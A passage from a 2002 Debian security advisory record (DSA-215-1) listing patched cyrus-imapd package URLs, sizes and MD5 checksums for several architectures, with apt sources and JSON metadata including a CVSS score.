http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 65700 3852d4c333200d476240e7c63626e2f0\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 41650 43b8fe90f0a1b3b0bc7479a6a773725f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 486124 79be4f0ea1ca2bafc7a4cb1a01c099cb\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 83324 52f8b0e955dd2c67fb984330517a1a0d\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 143844 b19880c3f1c0c5d1562162098fced833\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 141796 371b7d6898e2ccb91bc165de28203169\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_mipsel.deb\n Size/MD5 checksum: 66146 1c03a95b5983c6ba4cb2a27ba7aeb5bf\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 40158 9dd472cdf3509dcc5e065482e6d77ffd\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 457326 2b72dd98148c854f465500bc345c7eaf\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 80854 49c45a1c59010673ba167bf0331fa0dc\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 134930 36e0dfb12165ad289172d85a77bbf29f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 133402 d4db29ae6f4d6802e02bcdb66a61a0e2\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_powerpc.deb\n Size/MD5 checksum: 62370 f82988c569a94f368d8c5cc7df98f007\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 40578 a55de3a30940aa8af266d06fb709bbcf\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 425896 897c5163ff6f81f613b542668508f624\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 77720 fa632ff17ca7f2b7c03b2dc0bd822d40\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 127438 af839029be317f76e569373215212d54\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 122952 babf1fc12682d6c61316a335c5ae2530\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_s390.deb\n Size/MD5 checksum: 58376 80609b6a3f1bc1801a1635be6a054981\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 39810 95d1263c795e9fde2650106b620f1bad\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 435842 83ecee19b8dc92aaa6fb881c27b80dde\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 79284 93ed311588e9922541f263dba2eac56f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 130800 fedae0b42f33ea5e4a79bcd7b87e52cc\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 126886 a61b3c09914174a523855c4571064ddb\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_sparc.deb\n Size/MD5 checksum: 60116 7c15618cbcc041fbc774577e6baed0f6\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2002-12-23T00:00:00", "published": "2002-12-23T00:00:00", "id": "DEBIAN:DSA-215-1:31563", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00142.html", "title": "[SECURITY] [DSA 215-1] New cyrus-imapd packages fix remote command execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}